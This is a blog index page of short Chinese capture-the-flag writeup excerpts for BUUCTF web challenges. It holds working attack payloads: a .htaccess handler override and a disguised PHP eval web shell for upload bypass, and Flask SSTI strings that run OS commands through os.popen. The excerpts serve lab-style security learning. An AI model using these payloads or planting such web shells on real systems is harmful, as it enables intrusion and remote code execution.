![](https://img-blog.csdnimg.cn/20190927151026427.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
buuctf
记录一些buuctf的writeup
尸者狗
这个作者很懒,什么都没留下…
展开
-
[MRCTF2020]你传你呢
准备一张图片马,命名shell.png.htaccess文件<FilesMatch "s">SetHandler application/x-httpd-php</FilesMatch>需要用burp修改Content-Type: image/jpeg原创 2020-09-06 21:48:48 · 738 阅读 · 0 评论 -
GYCTF2020 FlaskApp
GYCTF2020 FlaskApp,老规矩,还是buu的平台知识点flask的SSTIssti的绕过(拼接字符串,倒序切片,内置对象、函数)pin码的生成信息收集因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的直接报错抛出debug信息,看来是开启了debug模式参见该文章:Flask开启debug模式等于给黑客留了后门而且读到了app.py的部分代码大致的原创 2020-09-04 13:55:35 · 1699 阅读 · 0 评论 -
RootersCTF2019 I ♥ Flask
知识点url参数爆破、ssti信息收集看了别人的wp,才知道http参数这方面的信息收集这里使用arjun,当然也可以万能的burpsuitepython3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get得到参数name改成/?name={{3*3}}利用和get flag获取当前目录下文件列表xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').原创 2020-08-29 15:47:50 · 480 阅读 · 0 评论 -
[CSCCTF 2019 Qual] FlaskLight
信息收集index大致就这样,没什么信息F12看下,发现了线索:search参数试下ssti基本就是ssti了漏洞利用config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。{{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}}爆出一堆信息,这里获得第二个线索,flag在这个目录You searched for:[('JSON_原创 2020-08-29 13:37:28 · 1545 阅读 · 1 评论 -
Web-[极客大挑战 2019] Upload1
文章目录[极客大挑战 2019]Upload1[极客大挑战 2019]Upload1shell名she.phtml内容GIF98a<script language="php">eval($_POST['cmd']);</script>burp抓包Content-Type: image/jpeg在upload/目录下,访问页面,蚁剑连接,cat /flag...原创 2020-05-21 13:04:43 · 1090 阅读 · 0 评论